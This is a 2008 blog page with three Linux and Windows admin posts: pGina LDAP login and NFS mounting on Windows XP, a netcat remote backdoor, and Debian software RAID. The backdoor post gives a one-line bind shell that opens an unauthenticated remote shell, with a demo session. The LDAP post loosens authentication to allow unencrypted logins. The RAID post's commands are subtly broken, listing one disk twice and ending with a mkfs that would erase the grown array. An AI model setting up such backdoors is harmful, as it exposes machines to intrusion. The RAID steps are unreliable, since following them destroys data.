OpenLDAP Client and NFS on Windows XP

Posted in LDAP, Security, Windows on April 28th, 2008 by termina

I am assuming your LDAP server is set up as per my previous post.

Before we go further, I would suggest setting up NFS and then updating your /etc/ldap/slapd.conf file

Since Windows (for me) had issues importing my openssl generated cert, I had to allow unencrypted. Depending on your setup, you may not find this to be a suitable option. You must then get a CA cert that isn’t self-signed.

Otherwise, just add ‘by auth’ to your existing access block.


access to attrs=userPassword,shadowLastChange
by tls_ssf=128 ssf=128 dn="cn=admin,dc=uwptechforce,dc=com" write
by tls_ssf=128 ssf=128 anonymous auth
by tls_ssf=128 ssf=128 self write
by auth
by * none

/etc/init.d/slapd restart

Go to http://pgina.org/ and download pGina and Plugins. Install pGina and extract the Plugins archive into c:pGina

You will have to install ldapauth; the installer for x86 and x86_64 is located in C:pGinapluginsLDAP

Unfortunately, from here on out we have to use a graphical configuration utility. Execute C:pGinaconfigure.bat

In the ‘Plugin’ tab, Select this file for the ‘Plugin Path’

C:pGinapluginsldapauthldapauth_plus.dll

You may also want to check the Show authentication method checkbox on this tab; it allows you to select between LDAP and the Local machine in the login window.

Under the Account Interaction tab, check:

Keep Profiles: This will allow you to have persistent files/settings, allow you to make persistent permission changes (remote desktop, file permissions, etc.).

Force Login: If you change your password elsewhere, this will allow you to use the local password with the password you’re authenticated with

Under the Profile tab, you might want to consider changing the default groups for users who log in (separated with semi-colons). By default everyone is a ‘Limited’ user; Power Users might be more appropriate for a Windows workstation. Do not set any options for ‘Profiles’; they do not work and will conflict with LDAP.

We will now configure LDAP using the Plugin Tester; it provides a good way to debug issues and allows you to configure/test in an easy manner. Execute C:pGinaplugin_tester.exe

Browse and select C:pGinapluginsldapauthldapauth_plus.dll. Now let’s configure it.

Click on the ‘Search’ button. Next to LDAP Server enter the hostname/ip of your LDAP server. Set the port to 389. Add “ou=People,dc=server,dc=com” in Contexts.

If you would like to restrict what users can log into pGina, you can set this in the User Configuration tab. I would recommend against changing anything else here until you have a working setup.

Now for the test. Push the pGina Load button. Enter a user/pass and push ‘Login’.

If this does not work, do the usual and debug slapd and look in the Event Viewer in Windows.

Now for NFS.

On any linux LDAP client, you will need to getent passwd > map.txt && getent group > map2.txt to generate a passwd-like file for Windows. No passwords are stored here. I suggest doing this on the NFS server in cron.


0 1 * * 1 getent passwd > /nfs/map.txt
0 1 * * 1 getent group > /nfs/map2.txt

Once a week your passwd and group map will be updated; coincidentally Windows NFS client updates it’s mapping once a week by default. Feel free to change this to happen more often if needed.

Still, you need to copy over map.txt and map2.txt from Linux before NFS works.

Google Windows Services for UNIX Version 3.5. Extract it and run the installer; select ONLY the Client for NFS under NFS and User Name Mappings under Authentication tools for NFS. When prompted, choose ‘passwd-like files’ instead of NIS.

When prompted, browse for your map.txt and map2.txt files.

Create a file called C:nfs.bat


mount 192.168.1.1home Z:

You probably want to run this at startup; just add a new “String Value” in HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun with a name like “mount nfs” and a value of C:nfs.bat

This entry can be easily disabled later with msconfig.

Now run nfs.bat, and check to see that a Z: was created. If so, you’re done!

Remote backdoor on Linux using ‘nc’

Posted in Code, Security on April 25th, 2008 by termina

nc -l -e /bin/bash -p 10001

Not much to explain here. -l listens for incoming connections, -e executes /bin/bash when you connect, and -p chooses the port to listen on.

You must use a semicolon after each command.

[email protected]:~$ telnet localhost 10001
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
whoami;
will

There you go. Obviously this has the potential for misuse; running this as root will create a remote backdoor after all. But it’s also a very useful administrative tool. Keep in mind that nc is not encrypted in any way, and anyone could use this to connect.

nc terminates after you exit your connection, and only one person can be connected at once.

Raid on Debian Etch

Posted in HowTo, Informational, Storage on April 12th, 2008 by termina

If you’d like to do some RAID 0/1 in Debian Etch with some SATA drives you can do this in only a few simple steps.

cfdisk all your drives; create your partition(s) and make the type linux-raid-autodetect (Type: FD).

mknod /dev/md0 b 9 0

mdadm –create /dev/md0 –level 0 –raid-devices=2 /dev/sda1 /dev/sdb1

You can do level 1 the same way. Keep in mind that if you do multiple md devices, change the last number to the number of the device (mknod /dev/md1 b 9 1, for example).

For RAID 5, do

mdadm –create /dev/md0 –level 5 –raid-devices=3 /dev/sda1 /dev/sdb1 /dev/sdb1

Just keep in mind that RAID 5 needs three or more drives to work.

If you’d like to add more drives to a RAID 5, you can do so easily.

mdadm –add /dev/md0 /dev/sdd1
mdadm –grow /dev/md0 –raid-devices=4

After doing this, you need to resize your filesystem on md0

apt-get install lvm2 lvm-common

pvresize /dev/md0

pvdisplay

You should now be using the full size of the array.

Now all you have to do is

mkfs.ext3 /dev/md0